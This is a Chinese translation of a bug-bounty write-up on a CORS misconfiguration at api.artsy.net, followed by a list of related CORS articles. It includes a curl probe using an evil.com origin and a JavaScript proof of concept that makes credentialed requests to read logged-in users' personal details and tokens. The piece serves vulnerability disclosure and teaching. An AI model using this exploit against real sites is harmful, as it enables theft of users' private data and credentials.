利用不安全的跨源资源共享(CORS)---api.artsy.net

最新推荐文章于 2024-08-20 10:51:49 发布
最新推荐文章于 2024-08-20 10:51:49 发布
阅读量4.5k 收藏 1
点赞数
分类专栏: 外文翻译

翻译自 https://bugbountypoc.com/exploiting-cross-origin-resource-sharing/ (这个网站会公开获得赏金的漏洞的poc,方法,思路)
译者:聂心明
利用不安全的跨源资源共享(CORS)– BugBountyPOC
这个文章的公开者是BugBountyPOC.Note的贡献者Muhammad Khizer Javed,这篇文章的作者是Muhammad Khizer Javed & 文章中所有的问题只能被他处理,我们允许匿名者作为guest/贡献者在我们的博客上发布内容,其他可以过来一起学习。如果你想在Bug Bounty POC平台发布你的思路,就来我们这里注册,然后就可以在这里免费发布任何文章。
大家好,我是Khizer,过去的几天,我一直在测试不同的网站,目的是寻找跨源资源共享(CORS)漏洞。这是因为我用了大概一周的时间看了不同网站和博客目的是为了学习这个漏洞,之后我找到一个比较脆弱的网站,然后我就试试这个网站是否存在CORS漏洞
首先我用CURL这个指令来测试这个网站

i.e: curl https://api.artsy.net -H “Origin: https://evil.com” -I

image
当你看到的返回结果包括

Access-Control-Allow-Credentials: true


Access-Control-Allow-Origin: https://evil.com

这意味这个网站有CORS配置漏洞,然后我根据GeekBoy博客文章中提到的利用方法,他的博客对于CORS的利用讲的很详细。我发现一个接口可以查看已登录用户的详细信息。

https://api.artsy.net/api/user_details/

我使用geekboy分享的exp来检测,看看能不能导出用户的id,注册日期,邮箱,手机号,用户凭证,重置密码凭证,收藏品,用户设备等用户信息。
image
利用代码:

function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById(“demo”).innerHTML =
alert(this.responseText);
}
};
xhttp.open(“GET”, “https://api.artsy.net/api/user_details/<User-ID>”, true);
xhttp.withCredentials = true;
xhttp.send();
}

我上传我的poc到我的服务器。
image
如果一个已经登陆的用户访问我们的网站的话,那么就可以把他的个人信息导入到我的网站里面
image
利用视频:
https://youtu.be/mkv8aoJzGSo

最后我感谢Geekboy和其他人的文章来帮助我理解CORS漏洞的利用方式。

niexinming
关注
专栏目录
【Web安全CORS跨域资源共享漏洞
做自己喜欢的事,并将其发挥到极致!
11-07 1172
跨域资源共享(CORS)是一种浏览器机制,允许网页使用来自其他页面或域的资产和数据。大多数站点需要使用资源和图像来运行它们的脚本。这些嵌入式资产存在安全风险,因为这些资产可能包含病毒或允许服务器访问外部攻击者。如果目标存在CORS跨域资源共享漏洞,并且在管理员没有退出网站的情况下,点击攻击者已经构造好的恶意网站,攻击者可以修改Origin字段为任意指定的值,实现绕过浏览器同源策略的限制,基于CORS漏洞发起恶意请求,实现对目标资源的恶意跨域访问,并读取服务器的响应结果,从而造成服务器的信息泄露。
跨源资源共享CORS
诗渊的博客
07-27 6644
本博文中介绍了跨域的另一种思想:跨源资源共享CORS),介绍了CORS的基本的思想以及在IE和其他浏览器中的实现方法,最后给出了兼容各大浏览器的CORS的实现方法。
CORS 跨域资源共享漏洞
weixin_45653478的博客
03-21 1969
跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据。我们先来简单分析一下 CORS 跨域获取资源的过程:CORS 定义了两种跨域请求:简单请求 和 非简单请求。简单跨域请求就是使用设定的请求方式请求数据,而非简单跨域请求则是在使用设定的请求方式请求数据之前,先发送一个 OPTIONS 预检请求,验证请求源是否为服务端允许源。
CORS跨域访问漏洞
最新发布
YhMjQx的博客
08-20 1580
本篇文章主要讲解CSRF漏洞的原理,并复现漏洞和利用
SRC | CORS资源共享漏洞
zkaqlaoniao的博客
11-06 350
如果目标存在CORS资源共享漏洞,对方管理员在没有退出自己所管理的网站的情况下,点击恶意攻击者已经构造好的恶意网站,攻击者可以修改Origin字段为任意指定的值,实现绕过浏览器同源策略的限制,基于CORS漏洞发起恶意请求,实现对目标资源的恶意跨域访问,并读取服务器的响应结果,从而造成服务器的信息泄露。Access-Control-Allow-Origin:指定允许访问该资源的源。Access-Control-Max-Age:指定预检请求(OPTIONS)的有效期,以减少对服务器的频繁请求。
django-cors-headers-3.0.2.tar.gz
01-03
**描述解析:** "django-cors-headers" 是 Django 框架的一个扩展,专门处理跨源资源共享CORS,Cross-Origin Resource Sharing)的问题。CORS 是一种 W3C 标准,允许浏览器和服务器之间进行跨域通信,从而放宽了...
cors-filter-1.7.jar,cors-filter-2.5.jar,cors-filter-2.10.jar
06-20
在IT行业中,尤其是在Web开发领域,跨域资源共享CORS,Cross-Origin Resource Sharing)是一个重要的概念,它允许浏览器向不同的源(域名、协议或端口)发送Ajax请求,以突破同源策略的限制。Tomcat作为一款广泛...
Tomcat解决跨域的两个jar包java-property-utils-1.9.jar和cors-filter-1.7.jar
10-13
总结来说,`java-property-utils-1.9.jar`和`cors-filter-1.7.jar`这两个jar包结合使用,可以方便地在Tomcat服务器上实现跨域资源共享。它们通过提供动态配置和CORS过滤器的功能,帮助开发者克服同源策略带来的障碍...
CORS包java-property-utils-1.9.jar和cors-filter-1.7-sources.jar
10-22
CORS(Cross-Origin Resource Sharing,跨源资源共享)是一种机制,允许Web应用从不同的源获取资源,比如JavaScript通过Ajax请求访问不同域名下的数据。在默认情况下,浏览器实施同源策略,限制了这种跨域请求,但...
cors-filter-2.5 + java-property-utils-1.9.1.zip
08-21
跨域资源共享CORS,Cross-Origin Resource Sharing)是一种机制,允许Web应用从不同的源(比如不同的域名、协议或端口)获取资源。在现代Web开发中,由于浏览器的同源策略限制,通常JavaScript只能访问与当前页面...
CORS跨源资源共享
南舟
10-29 1194
通过XHR实现Ajax通信的一个主要限制,来源于跨域安全策略。默认情况下,XHR对象只能访问与包含它的页面位于同一个域中的资源。这种安全策略可以预防某些恶意行为。但是,实现合理的跨域请求对于开发某些浏览器应用程序也是至关重要的。 CORS是W3C的一个工作草案,定义了在必须访问跨源资源时,浏览器与服务器应该如何沟通。CORS的实现原理,就是使用自定义的HTTP头部让浏览器与服务器进行沟通,从
CORS跨域资源共享漏洞的复现、分析、利用及修复过程
Innocence_0的博客
02-02 3099
CORS跨域资源共享漏洞与JSONP劫持漏洞类似,都是程序员在解决跨域问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,
跨域资源共享漏洞分析总结(含实战)
qq_43571759的博客
04-29 7597
文章目录跨源资源共享(CORS)浏览器的同源策略概念特点主要功能跨域主要跨域请求方法JSONP跨域CORS跨域CORS安全问题三种不安全的配置引起的安全问题通过CORS信任关系 利用XSS使用错误的CORS破坏TLS防御CORS如何预防基于CORS的攻击正确配置跨域请求只允许信任的网站避免将null列入白名单避免在内部网络中使用通配符CORS不能替代服务器端安全策略 跨源资源共享(CORS) 浏...
CORS(跨站资源共享)介绍
测试
12-03 538
起因 有同学在nginx站点配置中加了一行Access-Control-Allow-Origin *,导致微信中业务数据异常,抓包看http头有两个Access-Control-Allow-Origin字段,一个是站点自己的域名,一个是*。 为了实现跨域资源访问,在代码和nginx配置中都加了Access-Control-Allow-Origin字段,但是浏览器有个原则,如果有两个Acc...
常见的Web漏洞——CORS
江左盟的博客
06-05 1579
渗透做了多年的朋友都知道,大洞小洞都是漏洞。因此也学习、沉淀一下以前没重视的漏洞。CORS的漏洞原理、检测和利用方法。
SRC实战 | CORS资源共享漏洞
zkaqlaoniao的博客
03-28 804
如果目标存在CORS资源共享漏洞,对方管理员在没有退出自己所管理的网站的情况下,点击恶意攻击者已经构造好的恶意网站,攻击者可以修改Origin字段为任意指定的值,实现绕过浏览器同源策略的限制,基于CORS漏洞发起恶意请求,实现对目标资源的恶意跨域访问,并读取服务器的响应结果,从而造成服务器的信息泄露。Access-Control-Allow-Origin:指定允许访问该资源的源。Access-Control-Max-Age:指定预检请求(OPTIONS)的有效期,以减少对服务器的频繁请求。
启用跨源请求 (CORS)
weixin_34038652的博客
10-09 271
https://docs.microsoft.com/zh-cn/aspnet/core/security/cors
allow-cors-access-control.crx 插件如何使用
06-11
allow-cors-access-control 是一个谷歌浏览器扩展程序,用于解决浏览器的跨域问题。下面是使用该插件的步骤: 1. 打开谷歌浏览器,进入扩展程序页面。可以在浏览器地址栏输入 "chrome://extensions/",或者点击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值